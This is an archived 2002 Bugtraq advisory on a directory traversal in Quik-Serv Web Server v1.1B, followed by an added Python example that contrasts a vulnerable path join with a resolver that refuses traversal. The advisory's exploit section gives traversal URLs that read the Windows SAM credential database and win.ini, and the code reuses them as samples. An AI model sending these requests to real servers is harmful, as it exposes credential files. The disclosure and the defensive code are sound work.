Bugtraq mailing list archives

Quik-Serv Web Server v1.1B Arbitrary File Disclosure
From: "a b" <p0pt4rtz () hotmail com>
Date: Wed, 03 Apr 2002 13:20:44 -0800


Quik-Serv Web Server v1.1B Arbitrary File Disclosure

Abstract:
Quik-Serv Web Server is a small webserver with CGI implemented into
it. The server is vulnerable to a directory traversal which allows
a remote user to display arbitrary files.

Exploit:
To display the SAM database
http://server/../../../winnt/repair/sam

To display the win.ini file
http://server/../../../winnt/win.ini

Workaround:
Install packet filtering systems, wait for a fix, or don't even use
the product.

Vendor Status:
The vendor has been contacted, but no reply has been received.
--
p0p t4rtz
p0pt4rtz () hotmail com
NetCra$h Security Research Team
http://www26.brinkster.com/netcrash/

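Added example, not part of the original post and not Quik-Serv's own code: the unchecked path join that produces this class of disclosure, next to a resolver that refuses any request resolving outside the document root. The document root and function names are assumptions made for illustration; `ntpath` is used so Windows path rules apply on any platform.

```python
import ntpath
from urllib.parse import unquote

DOC_ROOT = r"C:\quikserv\htdocs"  # constructed document root (assumption)


def naive_resolve(url_path, root=DOC_ROOT):
    """Vulnerable pattern: append the request path to the root unchecked."""
    return ntpath.normpath(root + url_path.replace("/", "\\"))


def safe_resolve(url_path, root=DOC_ROOT):
    """Return the file path to serve, or None if the request is refused."""
    decoded = unquote(url_path)  # decode once, so %2e%2e is seen as ".."
    if "\x00" in decoded:
        return None
    rel = decoded.replace("/", "\\").lstrip("\\")
    if ":" in rel:  # drive letters and NTFS alternate data streams
        return None
    candidate = ntpath.normpath(ntpath.join(root, rel))
    root_n = ntpath.normcase(ntpath.normpath(root))
    cand_n = ntpath.normcase(candidate)
    # Compare against root plus a separator so a sibling directory such as
    # "htdocs-private" does not pass a plain prefix test.
    if cand_n != root_n and not cand_n.startswith(root_n + "\\"):
        return None
    return candidate


# Constructed sample requests; the first two are the paths from the advisory.
SAMPLES = [
    "/../../../winnt/repair/sam",
    "/../../../winnt/win.ini",
    "/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini",
    "/docs/../index.html",
    "/index.html",
]

if __name__ == "__main__":
    for req in SAMPLES:
        print(f"{req!r:45} naive={naive_resolve(req)!r} safe={safe_resolve(req)!r}")
```

The check is lexical only and does not account for junctions or 8.3 short names, so it complements filesystem permissions on the server account and does not replace them.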

